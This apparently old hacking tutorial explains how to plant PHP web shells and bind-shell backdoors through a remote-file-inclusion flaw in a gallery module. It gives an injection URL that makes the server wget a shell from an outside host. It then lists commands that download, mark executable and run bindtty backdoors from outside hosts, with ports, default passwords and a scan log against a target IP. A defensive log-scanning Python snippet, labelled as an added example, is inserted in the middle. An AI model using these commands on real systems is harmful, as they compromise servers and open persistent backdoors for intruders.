=====================
Install PHP shell
=====================
### Example
http://livron.port5.com/mail.php <--------- this is the shell source
For example:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
If the message "permission denied" appears, look for another folder where our shell.php can be fetched with wget.
If it works... open:
http://www.target.org/modules/My_eGallery/public/log.php
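
On the defending side, the request above leaves a recognizable trace in the web server's access log: one parameter whose value is a remote URL, next to a parameter carrying shell commands. The following is an added example, not part of the original post; the log lines, client addresses and `.example` hosts are constructed, and the `remote`/`shell` labels and verdict names are illustrative assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format; hosts and clients are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2006:10:00:00 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://files.example/suntik.txt?&cmd=wget%20http://files.example/mail.php%20-O%20log.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2006:10:00:05 +0000] "GET /modules/My_eGallery/public/displayCategory.php?basepath=/var/www/gallery HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jan/2006:10:00:09 +0000] "GET /redirect.php?next=http%3A%2F%2Fpartner.example%2F HTTP/1.1" 302 0',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Command names that appear in the requests and shell lines on this page.
SHELL_RE = re.compile(r'\b(?:wget|curl|chmod|gcc|tar|uname)\b', re.I)


def classify(line):
    """Return (client, path, verdict, hits), or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, _status = m.groups()
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so %20 and %3A are normalised first.
    params = parse_qsl(parts.query, keep_blank_values=True)
    remote = [k for k, v in params if REMOTE_RE.match(v)]
    shell = [k for k, v in params if SHELL_RE.search(v)]
    if remote and shell:
        verdict = "high"    # remote include combined with a command parameter
    elif remote or shell:
        verdict = "review"  # may be a legitimate redirect or search parameter
    else:
        verdict = "clean"
    return client, parts.path, verdict, {"remote": remote, "shell": shell}


def findings(lines):
    """Classify every line and keep only the ones that need attention."""
    results = (classify(line) for line in lines)
    return [r for r in results if r and r[2] != "clean"]


if __name__ == "__main__":
    for client, path, verdict, hits in findings(SAMPLE_LOG):
        print(f"{verdict:6} {client:15} {path} {hits}")
```

Only single percent-encoding is decoded here; double-encoded values and POST bodies are outside what this example covers.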
==============
Install bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
Above we use port 4000 as the binding port. Now check whether port
4000 is open: scan with phnxscan.c, written by the author; you can download
its source code at http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Compile
and run it using gcc, then scan port 4000 on the server www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet to the target server on port 4000; if it succeeds you will be asked to enter
a password, whose default from the script is changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd   <--- this puts the wget result in the /tmp folder under the file name httpd
then make the file executable
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------
# test with `uname -a` < only kernel 2.4.20 and below works
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# when that is done, open PuTTY > enter the host > choose telnet > set port: 1980
# if it succeeds you will land in a shell
### use a different bind if you want the shell to have a password
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet to the host on port 6665, passwd `stimik`
## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet to the host on port 6665, passwd `gagal`
## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029